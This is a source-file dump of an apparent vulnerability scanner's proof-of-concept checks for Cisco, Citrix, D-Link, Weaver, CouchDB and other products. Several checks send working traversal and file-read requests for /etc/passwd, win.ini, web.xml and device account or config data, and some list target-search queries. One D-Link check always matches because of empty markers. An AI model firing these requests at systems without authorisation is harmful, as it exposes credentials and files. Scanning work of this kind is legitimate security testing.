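            self.result.append({
                "name": self.name,
                "url": parser_.geturl(),
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })

--------------------------------------------------------------------------------
/myscan/pocs/perfolder/__template.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020-02-14
# @Author : caicai
# @File : __template.py

# Template for a per-folder POC: copy this file as <pocname> and put your own
# logic in verify().
from myscan.lib.parse.dictdata_parser import dictdata_parser  # helper class for working with dictdata
from myscan.lib.parse.response_parser import response_parser  # helper class for working with a response
from myscan.lib.helper.request import request  # wrapper around requests.request; recommended, it counts requests in redis
from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send  # socket helpers, if needed
from myscan.config import scan_set


class POC():
    """Per-folder POC skeleton.  ``self.url`` is a directory URL; the depth
    guard in ``verify`` keeps the probe within ``scan_set['max_dir']``."""

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # Python dict; see the example dict in the docs development guide
        self.url = workdata.get("data")  # directory URL under test, always ending in '/', e.g. https://www.baidu.com/home/
        self.result = []  # findings: each dict must carry name, url, level and detail, and detail must itself be a dict (see the append below)
        self.name = "your poc name"
        self.vulmsg = "your poc detail msg"
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """Replace the body after the depth guard with the actual check."""
        # Limit directory depth according to max_dir in config.py
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        self.result.append({
            "name": self.name,
            "url": self.url,
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "request":"",
                "response":""
            }
        })

--------------------------------------------------------------------------------
/myscan/pocs/perfolder/apache/__init__.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/8/21
# @Author : caicai
# @File : __init__.py.py
--------------------------------------------------------------------------------
/myscan/pocs/perfolder/apereo/__init__.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/11/26
# @Author : caicai
# @File : __init__.py.py
--------------------------------------------------------------------------------
/myscan/pocs/perfolder/axis/__init__.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/8/21
# @Author : caicai
# @File : __init__.py.py
--------------------------------------------------------------------------------
/myscan/pocs/perfolder/baota/__init__.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/8/23
# @Author : caicai
# @File : __init__.py.py
--------------------------------------------------------------------------------
/myscan/pocs/perfolder/baota/poc_baota_pmaunauth_2020.py: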
-------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/23 3 | # @Author : caicai 4 | # @File : poc_baota_pmaunauth_2020.py 5 | ''' 6 | fofa 7 | port=888 && body="403 Forbidden" 8 | ''' 9 | 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | import re 14 | 15 | 16 | class POC(): 17 | def __init__(self, workdata): 18 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 19 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 20 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 21 | self.name = "baota_pmaunauth" 22 | self.vulmsg = "no detail .just open it . exploit it " 23 | self.level = 2 # 0:Low 1:Medium 2:High 24 | 25 | def verify(self): 26 | # 根据config.py 配置的深度,限定一下目录深度 27 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 28 | return 29 | req = { 30 | "method": "GET", 31 | "url": self.url + "pma/", 32 | "timeout": 10, 33 | "allow_redirects": False, 34 | "verify": False, 35 | } 36 | r = request(**req) 37 | if r is not None and r.status_code == 200 and re.search(b".*?phpmyadmin.*?", r.content,re.I) and b"PHP version" in r.content: 38 | parser_ = response_parser(r) 39 | self.result.append({ 40 | "name": self.name, 41 | "url": req["url"], 42 | "level": self.level, # 0:Low 1:Medium 2:High 43 | "detail": { 44 | "vulmsg": self.vulmsg, 45 | "request": parser_.getrequestraw(), 46 | "response": parser_.getresponseraw() 47 | } 48 | }) 49 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/basework/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # 
class POC():
    """Fetch-only POC used by the basework stage (do not delete, per the original).

    ``verify`` never appends a finding. It only issues a GET for the directory
    through the shared ``request`` helper so that the response becomes visible to
    the search module, which is what actually reports on it.
    """

    def __init__(self, workdata):
        # Parsed data of the original traffic (schema: docs/ development guide).
        self.dictdata = workdata.get("dictdata")
        # Directory URL under test; ends with "/" (e.g. https://host/home/).
        self.url = workdata.get("data")
        # Always stays empty for this POC.
        self.result = []
        self.name = "your poc name"
        self.level = 1  # 0:Low 1:Medium 2:High

    def verify(self):
        """GET the directory with the original headers; the response is discarded here."""
        original_headers = self.dictdata.get("request").get("headers")
        # Redirects are followed for this fetch, unlike the other POCs.
        request(
            method="GET",
            url=self.url,
            headers=original_headers,
            timeout=10,
            verify=False,
            allow_redirects=True,
        )
workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "bullwark-momentum-lfi" 21 | self.vulmsg = "link: https://www.exploit-db.com/exploits/47773" 22 | self.level = 2 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 根据config.py 配置的深度,限定一下目录深度 26 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 27 | return 28 | req = { 29 | "method": "GET", 30 | "url": self.url + "../../../../../../../../../../../../../etc/passwd", 31 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 32 | "timeout": 10, 33 | "verify": False, 34 | } 35 | r = request(**req) 36 | if r is not None and r.status_code == 200 and b"/root:/bin" in r.content: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": self.url, 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/cacti/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/cisco/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/cisco/pcc_cisco_route_cve-2019-1653_2019.py: 
class POC():
    """Cisco RV-series router CVE-2019-1653: unauthenticated ``cgi-bin/config.exp`` download.

    Only runs against HTTPS targets (the original traffic's protocol is checked).
    A match requires HTTP 200, a ``Content-Disposition`` naming ``config.exp`` and
    the ``###sysconfig##`` marker in the body. Search hints from the original:
    fofa ``body="out of the Cisco Router"`` or ``app="CISCO-RV320"``.
    """

    def __init__(self, workdata):
        # Parsed data of the original traffic (schema: docs/ development guide).
        self.dictdata = workdata.get("dictdata")
        # Directory URL under test; ends with "/" (e.g. https://host/home/).
        self.url = workdata.get("data")
        # Findings: dicts with name/url/level/detail, detail itself a dict.
        self.result = []
        self.name = "cisco_route_cve-2019-1653"
        self.vulmsg = "google it "
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """Fetch ``cgi-bin/config.exp`` and record a High finding on a config export."""
        protocol = self.dictdata.get("url").get("protocol")
        if protocol != "https":
            return
        # Depth gate from config.py; "+2" offsets the two slashes of "://".
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        r = request(
            method="GET",
            url=self.url + "cgi-bin/config.exp",
            timeout=10,
            allow_redirects=False,
            verify=False,
        )
        if r is None or r.status_code != 200:
            return
        disposition = r.headers.get("Content-Disposition", "")
        if "config.exp" not in disposition:
            return
        if b"###sysconfig##" not in r.content:
            return
        parsed = response_parser(r)
        self.result.append({
            "name": self.name,
            "url": self.url,
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "request": parsed.getrequestraw(),
                "response": parsed.getresponseraw(),
            },
        })
class POC():
    """Cisco ASA / FTD CVE-2020-3452 unauthenticated file read via the translation-table endpoint.

    Requests ``+CSCOT+/translation-table`` with ``lang=../`` and reports when the
    body carries two strings expected from the leaked ``portal_inc.lua``. No
    status-code check is applied; the body markers alone decide. Search hint
    from the original: zoomeye ``app:"Cisco ASA SSL VPN"``.
    """

    def __init__(self, workdata):
        # Parsed data of the original traffic (schema: docs/ development guide).
        self.dictdata = workdata.get("dictdata")
        # Directory URL under test; ends with "/" (e.g. https://host/home/).
        self.url = workdata.get("data")
        # Findings: dicts with name/url/level/detail, detail itself a dict.
        self.result = []
        self.name = "cisco_asa_cve-2020-3452"
        self.vulmsg = "referer:https://mp.weixin.qq.com/s/i_x7gx_VratC6t8PaCg-Kg"
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """Send the traversal request and append a High finding when both markers match."""
        # Depth gate from config.py; "+2" offsets the two slashes of "://".
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        target = (
            self.url
            + "+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
        )
        r = request(
            method="GET",
            url=target,
            timeout=10,
            allow_redirects=False,
            verify=False,
        )
        if r is None:
            return
        markers = (b'otrizna@cisco.com', b"get_external_portal")
        if not all(m in r.content for m in markers):
            return
        parsed = response_parser(r)
        self.result.append({
            "name": self.name,
            "url": target,
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "request": parsed.getrequestraw(),
                "response": parsed.getresponseraw(),
            },
        })
class POC():
    """XenMobile CVE-2020-8209 directory traversal via ``jsp/help-sb-download.jsp``.

    (CVE-2020-8209 is a Citrix XenMobile issue; the file simply lives under the
    ``cisco`` folder in this repository.) The traversal is passed in the
    ``sbFileName`` query parameter and a finding is recorded when the body matches
    an ``/etc/passwd`` root entry (``root:x:0:0:`` or ``root:*:0:0:``).
    """

    def __init__(self, workdata):
        # Parsed data of the original traffic (schema: docs/ development guide).
        self.dictdata = workdata.get("dictdata")
        # Directory URL under test; ends with "/" (e.g. https://host/home/).
        self.url = workdata.get("data")
        # Findings: dicts with name/url/level/detail, detail itself a dict.
        self.result = []
        self.name = "xenmobile_cve-2020-8209"
        self.vulmsg = "referer:https://mp.weixin.qq.com/s/EiPdSw9d7cN0lMjXVxwvVA"
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """Request ``/etc/passwd`` through the traversal and append a High finding on match."""
        # Depth gate from config.py; "+2" offsets the two slashes of "://".
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        target = self.url + "jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
        r = request(
            method="GET",
            url=target,
            timeout=10,
            allow_redirects=False,
            verify=False,
        )
        if r is None:
            return
        # No status-code check in the original; the passwd pattern alone decides.
        if re.search(b"root:[x*]:0:0:", r.content) is None:
            return
        parsed = response_parser(r)
        self.result.append({
            "name": self.name,
            "url": target,
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "request": parsed.getrequestraw(),
                "response": parsed.getresponseraw(),
            },
        })
    def __init__(self, workdata):
        """Capture the work item for the Citrix ADC/Gateway CVE-2019-19781 probe.

        ``workdata["dictdata"]`` is the parsed original traffic (schema in the
        docs/ development guide); ``workdata["data"]`` is the directory URL under
        test, ending with "/". Findings accumulate in ``self.result`` as dicts
        with name/url/level/detail (detail itself a dict).
        """
        self.name = "citrix-cve-2019-19781-path-traversal"
        self.vulmsg = "referer: https://github.com/mpgn/CVE-2019-19781"
        self.level = 2  # 0:Low 1:Medium 2:High
        self.result = []
        self.dictdata = workdata.get("dictdata")
        self.url = workdata.get("data")
class POC():
    """Citrix CVE-2020-8982 unauthenticated file read via ``XmlPeek.aspx``.

    Marked "unverified" in the original file. Requests ``Windows\\win.ini`` through
    the ``dt`` parameter and reports when HTTP 200 and all three win.ini markers
    are present in the body.
    """

    def __init__(self, workdata):
        # Parsed data of the original traffic (schema: docs/ development guide).
        self.dictdata = workdata.get("dictdata")
        # Directory URL under test; ends with "/" (e.g. https://host/home/).
        self.url = workdata.get("data")
        # Findings: dicts with name/url/level/detail, detail itself a dict.
        self.result = []
        self.name = "citrix-cve-2020-8982"
        self.vulmsg = "google it "
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """Send the win.ini read and append a High finding when every marker matches."""
        # Depth gate from config.py; "+2" offsets the two slashes of "://".
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        # Each "\\\\" in the source is two literal backslashes on the wire.
        target = (
            self.url
            + "XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
        )
        r = request(
            method="GET",
            url=target,
            timeout=10,
            allow_redirects=False,
            verify=False,
        )
        if r is None or r.status_code != 200:
            return
        expected = (b"bit app support", b"fonts", b"extensions")
        missing = [w for w in expected if w not in r.content]
        if missing:
            return
        parsed = response_parser(r)
        self.result.append({
            "name": self.name,
            "url": self.url,
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "request": parsed.getrequestraw(),
                "response": parsed.getresponseraw(),
            },
        })
and b"rdspassword=" in r.content and b"encrypted=" in r.content: 34 | parser_ = response_parser(r) 35 | self.result.append({ 36 | "name": self.name, 37 | "url": parser_.geturl(), 38 | "level": self.level, # 0:Low 1:Medium 2:High 39 | "detail": { 40 | "vulmsg": self.vulmsg, 41 | "request": parser_.getrequestraw(), 42 | "response": parser_.getresponseraw() 43 | } 44 | }) -------------------------------------------------------------------------------- /myscan/pocs/perfolder/confluence/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/consul/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/coremail/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/coremail/poc_coremail-cnvd-2019-16798_2019.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-08 3 | # @Author : caicai 4 | # @File : poc_coremail-cnvd-2019-16798_2019.py 5 | 6 | 7 | 8 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 9 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 10 | from myscan.config import scan_set 11 | 12 | 13 | class POC(): 14 | def __init__(self, workdata): 15 | self.dictdata = 
workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 16 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 17 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 18 | self.name = "coremail config msg leak" 19 | self.vulmsg = "配置信息泄露漏洞" 20 | self.level = 2 # 0:Low 1:Medium 2:High 21 | 22 | def verify(self): 23 | # 根据config.py 配置的深度,限定一下目录深度 24 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 25 | return 26 | req = { 27 | "method": "GET", 28 | "url": self.url + "mailsms/s?func=ADMIN:appState&dumpConfig=/", 29 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 30 | "timeout": 10, 31 | "verify": False, 32 | "allow_redirects": False 33 | } 34 | r = request(**req) 35 | if r != None and r.status_code == 200 and b"" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": parser_.geturl(), 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/couchcms/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/couchdb/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/couchdb/poc_couchdb-unauth_2016.py: 
class POC():
    """CouchDB unauthenticated access, detected through a readable ``_config`` endpoint.

    Reports when ``<dir>_config`` answers HTTP 200 with three configuration
    section names in the body. The original rates this above the documented
    0-2 scale (level 3) because the exposure leads to RCE (see vulmsg).
    """

    def __init__(self, workdata):
        # Parsed data of the original traffic (schema: docs/ development guide).
        self.dictdata = workdata.get("dictdata")
        # Directory URL under test; ends with "/" (e.g. https://host/home/).
        self.url = workdata.get("data")
        # Findings: dicts with name/url/level/detail, detail itself a dict.
        self.result = []
        self.name = "couchdb-unauth"
        self.vulmsg = '''未授权可rce,referer:https://www.seebug.org/vuldb/ssvid-91597'''
        # 3 is outside the 0:Low 1:Medium 2:High scale used elsewhere; kept as
        # in the original -- confirm the reporter accepts it.
        self.level = 3

    def verify(self):
        """Fetch ``_config`` and append a finding when all section markers are present."""
        # Depth gate from config.py; "+2" offsets the two slashes of "://".
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        r = request(
            method="GET",
            url=self.url + "_config",
            timeout=10,
            verify=False,
            allow_redirects=False,
        )
        if r is None or r.status_code != 200:
            return
        sections = (b"replicator_manager", b"external_manager", b"httpd_design_handlers")
        if not all(s in r.content for s in sections):
            return
        parsed = response_parser(r)
        self.result.append({
            "name": self.name,
            "url": parsed.geturl(),
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "request": parsed.getrequestraw(),
                "response": parsed.getresponseraw(),
            },
        })
    def __init__(self, workdata):
        """Capture the work item for the Discuz! WeChat-plugin unauthenticated-login probe.

        ``workdata["dictdata"]`` is the parsed original traffic (schema in the
        docs/ development guide); ``workdata["data"]`` is the directory URL under
        test, ending with "/". Findings accumulate in ``self.result`` as dicts
        with name/url/level/detail (detail itself a dict).
        """
        self.name = "discuz-wechat-plugins-unauth"
        self.vulmsg = "check from https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI"
        self.level = 2  # 0:Low 1:Medium 2:High
        self.result = []
        self.dictdata = workdata.get("dictdata")
        self.url = workdata.get("data")
class POC():
    """D-Link CVE-2019-17506: account data via an unauthenticated ``getcfg.php`` POST.

    Posts ``SERVICES=DEVICE.ACCOUNT`` with ``AUTHORIZED_GROUP=1%0a`` and records a
    High finding on HTTP 200 (see the review note in ``verify`` about the body check).
    """

    def __init__(self, workdata):
        # Parsed data of the original traffic (schema: docs/ development guide).
        self.dictdata = workdata.get("dictdata")
        # Directory URL under test; ends with "/" (e.g. https://host/home/).
        self.url = workdata.get("data")
        # Findings: dicts with name/url/level/detail, detail itself a dict.
        self.result = []
        self.name = "dlink-cve-2019-17506"
        self.vulmsg = "referer: https://xz.aliyun.com/t/6453"
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """POST the DEVICE.ACCOUNT query to ``getcfg.php`` and append a finding on match."""
        # Depth gate from config.py; "+2" offsets the two slashes of "://".
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
        r = request(
            method="POST",
            url=self.url + "getcfg.php",
            headers=form_headers,
            data="SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a",
            timeout=10,
            verify=False,
            allow_redirects=False,
        )
        if r is None or r.status_code != 200:
            return
        # NOTE(review): both body markers are the empty byte string, so this test
        # is always True and every HTTP 200 from getcfg.php is reported. Markers
        # from a real DEVICE.ACCOUNT response are needed before trusting results;
        # the original markers may have been lost in this copy of the file.
        if not (b"" in r.content and b"" in r.content):
            return
        parsed = response_parser(r)
        self.result.append({
            "name": self.name,
            "url": parsed.geturl(),
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "request": parsed.getrequestraw(),
                "response": parsed.getresponseraw(),
            },
        })
26 | 27 | req = { 28 | "method": "GET", 29 | "url": self.url + "info", 30 | "headers": self.dictdata.get("request").get("headers"), 31 | "timeout": 10, 32 | "verify": False, 33 | "allow_redirects": False 34 | } 35 | r = request(**req) 36 | if r != None and r.status_code == 200 and b"KernelVersion" in r.content and b"RegistryConfig" in r.content and b"DockerRootDir" in r.content: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": parser_.geturl(), 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/druid/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/druid/poc_druid-monitor-unauth_2019.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-10 3 | # @Author : caicai 4 | # @File : poc_druid-monitor-unauth_2019.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "druid-monitor-unauth" 18 | 
    def verify(self):
        """Probe for an exposed Alibaba Druid monitor at ``<dir>druid/index.html``.

        Uses the original request's headers and records a finding on HTTP 200 when
        the three Druid stat-page markers are all present.
        """
        # Depth gate from config.py; "+2" offsets the two slashes of "://".
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        r = request(
            method="GET",
            url=self.url + "druid/index.html",
            headers=self.dictdata.get("request").get("headers"),
            timeout=10,
            verify=False,
            allow_redirects=False,
        )
        if r is None or r.status_code != 200:
            return
        markers = (b"Druid Stat Index", b"DruidVersion", b"DruidDrivers")
        if any(m not in r.content for m in markers):
            return
        parsed = response_parser(r)
        self.result.append({
            "name": self.name,
            "url": parsed.geturl(),
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "request": parsed.getrequestraw(),
                "response": parsed.getresponseraw(),
            },
        })
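class POC():
    """Weaver Ecology arbitrary file download via ``weaver/ln.FileDownload``.

    Requests ``../ecology/WEB-INF/web.xml`` through ``fpath`` and reports when the
    body looks like a web.xml. The original only required ``/weaver/`` in a 200
    body; an Ecology HTML page answering 200 also contains ``/weaver/`` links, so
    the check now additionally requires the ``<web-app`` root element that every
    web.xml deployment descriptor carries. Search hint from the original: fofa
    ``header="ecology_JSessionId"``.
    """

    def __init__(self, workdata):
        # Parsed data of the original traffic (schema: docs/ development guide).
        self.dictdata = workdata.get("dictdata")
        # Directory URL under test; ends with "/" (e.g. https://host/home/).
        self.url = workdata.get("data")
        # Findings: dicts with name/url/level/detail, detail itself a dict.
        self.result = []
        self.name = "ecology-filedownload-directory-traversal"
        self.vulmsg = "任意文件下载,referer:https://www.weaver.com.cn/cs/securityDownload.asp"
        # 3 is outside the 0:Low 1:Medium 2:High scale used elsewhere; kept as
        # in the original -- confirm the reporter accepts it.
        self.level = 3

    @staticmethod
    def _looks_like_web_xml(body):
        """True when ``body`` (bytes) carries the ``/weaver/`` marker and a web.xml root element."""
        return b"/weaver/" in body and b"<web-app" in body

    def verify(self):
        """Fetch web.xml through the traversal and append a finding when it is returned."""
        # Depth gate from config.py; "+2" offsets the two slashes of "://".
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        r = request(
            method="GET",
            url=self.url + "weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml",
            timeout=10,
            allow_redirects=False,
            verify=False,
        )
        if r is None or r.status_code != 200:
            return
        if not self._looks_like_web_xml(r.content):
            return
        parsed = response_parser(r)
        self.result.append({
            "name": self.name,
            "url": parsed.geturl(),
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
                "request": parsed.getrequestraw(),
                "response": parsed.getresponseraw(),
            },
        })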
''' 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "ecology-springframework-directory-traversal" 18 | self.vulmsg = "referer:https://www.weaver.com.cn/cs/securityDownload.asp" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | 26 | req = { 27 | "method": "GET", 28 | "url": self.url + "weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml", 29 | "timeout": 10, 30 | "allow_redirects": False, 31 | "verify": False, 32 | } 33 | r = request(**req) 34 | if r != None and r.status_code == 200 and b"/weaver/" in r.content: 35 | parser_ = response_parser(r) 36 | self.result.append({ 37 | "name": self.name, 38 | "url": parser_.geturl(), 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | "request": parser_.getrequestraw(), 43 | "response": parser_.getresponseraw() 44 | } 45 | }) 46 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/ecshop/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/elasticsearch/__init__.py: 
-------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/elasticsearch/poc_elasticsearch-unauth.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-11 3 | # @Author : caicai 4 | # @File : poc_elasticsearch-unauth.py 5 | 6 | 7 | 8 | # 此脚本为编写perfloder的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 9 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 10 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 11 | from myscan.config import scan_set 12 | 13 | 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "elasticsearch-unauth" 21 | self.vulmsg = "未授权访问" 22 | self.level = 2 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 根据config.py 配置的深度,限定一下目录深度 26 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 27 | return 28 | req = { 29 | "method": "GET", 30 | "url": self.url, 31 | "headers":self.dictdata.get("request").get("headers"), 32 | "timeout": 10, 33 | "allow_redirects": False, 34 | "verify": False, 35 | } 36 | r = request(**req) 37 | if r != None and r.status_code == 200 and "json" in r.headers.get("Content-Type","") and b"You Know, for Search" in r.content: 38 | parser_ = response_parser(r) 39 | self.result.append({ 40 | "name": self.name, 41 | "url": self.url, 42 | "level": self.level, # 0:Low 1:Medium 2:High 43 | "detail": { 44 | 
